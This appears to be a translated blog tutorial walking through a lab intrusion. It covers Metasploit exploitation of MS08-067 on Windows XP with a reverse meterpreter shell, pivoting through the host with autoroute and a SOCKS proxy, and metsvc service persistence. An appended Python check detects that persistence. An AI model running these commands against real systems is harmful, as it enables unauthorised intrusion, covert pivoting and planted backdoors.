Going beyond meterpreter: persistent access and reaching other hosts (kill with a borrowed knife)


Preface

Compromise the target host, set up a pivot on it and run a proxy server, then reach other hosts through the proxy host without leaving traces on them.


1. Use case

Going beyond meterpreter

Host a wants to reach c but cannot: c only allows access from specific IP addresses, for example b. In that case, compromise b first, set up a pivot on it with a proxy server, and reach c through that proxy.

In this example, host a runs Kali, host b runs Windows XP, and host c runs Linux.

2. Steps

1. Compromise host b

Because the target is Windows XP, start by testing the most common vulnerability, MS08_067.
Start the database first

┌──(root💀kali)-[~]
└─# service postgresql start

Enter msf, search for ms08_067, select the module and configure its parameters

msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.115
rhosts => 192.168.1.115

Launch the attack

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.115:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1384) at 2021-05-09 09:20:58 +0800

meterpreter > 

We now have a meterpreter session. Use autoroute to add a route entry; the address added is host c's address

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.1.106

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.1.106/255.255.255.0...
[+] Added route to 192.168.1.106/255.255.255.0 via 192.168.1.115
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.1.106      255.255.255.0      Session 1

meterpreter > 

Run background to return to the msf console

At this point we hold a meterpreter session on host b: it has been compromised and the route entry has been added.

2. Set up a SOCKS proxy server

Use the socks module, set the parameters, and run it directly

msf6 exploit(windows/smb/ms08_067_netapi) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) > 
[*] Starting the SOCKS proxy server

The proxy server port is now open; next, the proxychains configuration file /etc/proxychains4.conf still has to be edited

┌──(root💀kali)-[/]
└─# cat etc/proxychains4.conf 
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 1080  # modified line

The socks4 line in the file must be changed to this; it can be edited with vim, and basic vim usage was covered in the previous post.

With that, the configuration on the command-line side is complete.

3. Set the browser proxy

I use the Firefox ESR that ships with Kali; set the proxy there.
[screenshot: Firefox proxy settings]
Once the proxy is set, try to access the target.
[screenshot: access attempt through the proxy]
The reason access did not succeed here is most likely that the target's www directory contains no files, so there is nothing to reach.

4. Set up persistent access

Access to host b is easily lost, so it is necessary to make it persistent; here we do that by installing metsvc.

meterpreter > run metsvc -A

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\MWPrEozxdnwJwU...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

[*] Trying to connect to the Meterpreter service at 192.168.1.115:31337...
meterpreter > [*] 192.168.1.115 - Meterpreter session 2 closed.  Reason: Died

meterpreter > [*] Meterpreter session 2 opened (192.168.1.115:1385 -> 192.168.1.115:31337) at 2021-05-09 09:36:10 +0800

As you can see, metsvc creates a service listening on port 31337 and uploads a malicious binary. From now on, whenever we need to reach that service, just use the handler with the payload set to metsvc_bind_tcp and the session can be regained.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload payload/windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > set lport 31337
lport => 31337
msf6 exploit(multi/handler) > set rhost 192.168.1.115
rhost => 192.168.1.115
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.1.115:31337
[*] Meterpreter session 7 opened (192.168.1.115:1387 -> 192.168.1.115:31337) at 2021-05-09 09:45:09 +0800
meterpreter >

Successfully back in.
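A defender-side check for the persistence pattern shown in step 4, as an added example that is not part of the original post: it flags the metsvc service name, its binaries under C:\WINDOWS\TEMP\, and the default 31337 listener, running over constructed Event ID 7045 records and netstat output (the sample data and the line format are assumptions, not captured from the lab hosts).

```python
"""Flag metsvc-style service persistence in constructed Windows records."""
import re

# Constructed sample lines modelled on System log Event ID 7045
# ("A service was installed in the system"), one record per line.
SAMPLE_7045 = """\
7045 Service Name: Spooler Service File Name: C:\\WINDOWS\\system32\\spoolsv.exe Service Start Type: auto start
7045 Service Name: metsvc Service File Name: C:\\WINDOWS\\TEMP\\MWPrEozxdnwJwU\\metsvc.exe Service Start Type: auto start
7045 Service Name: UpdSvc Service File Name: C:\\Users\\bob\\AppData\\Local\\Temp\\u\\svc.exe Service Start Type: auto start
"""
# Constructed `netstat -ano` style output from the pivot host (b).
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       1532
  TCP    192.168.1.115:1384     192.168.1.113:4444     ESTABLISHED     1500
"""
KNOWN_SERVICE_NAMES = {"metsvc"}
KNOWN_BINARIES = {"metsvc.exe", "metsvc-server.exe"}
DEFAULT_METSVC_PORT = 31337  # port the metsvc service listened on in the session above
TEMP_DIR_RE = re.compile(r"\\(windows\\temp|appdata\\local\\temp|temp)\\", re.I)
RECORD_RE = re.compile(
    r"^7045 Service Name: (?P<name>.+?) Service File Name: (?P<path>.+?) Service Start Type:", re.I | re.M)

def analyze_service_installs(text):
    """Return (service name, image path, reasons) for each suspicious 7045 record."""
    findings = []
    for m in RECORD_RE.finditer(text):
        name, path = m.group("name"), m.group("path")
        binary = path.strip('"').rsplit("\\", 1)[-1].lower()
        reasons = []
        if name.lower() in KNOWN_SERVICE_NAMES:
            reasons.append("service name matches Metasploit metsvc")
        if binary in KNOWN_BINARIES:
            reasons.append("binary name matches a metsvc component")
        if TEMP_DIR_RE.search(path):
            reasons.append("service binary runs from a temp directory")
        if reasons:
            findings.append((name, path, reasons))
    return findings

def listening_tcp_ports(netstat_text):
    """Return the local TCP ports in LISTENING state from netstat-style text."""
    ports = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "TCP" and parts[3] == "LISTENING":
            ports.add(int(parts[1].rsplit(":", 1)[1]))
    return ports
```

Any service installed from a temp directory is worth a look even when the name is not metsvc, and a listener on the default 31337 port on a host that never exposed it before is a strong corroborating signal.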


Summary

This post gave a brief introduction to going beyond meterpreter scripts and establishing persistent access. I am still learning myself, so treat it as reference material and a study note only; discussion is welcome.
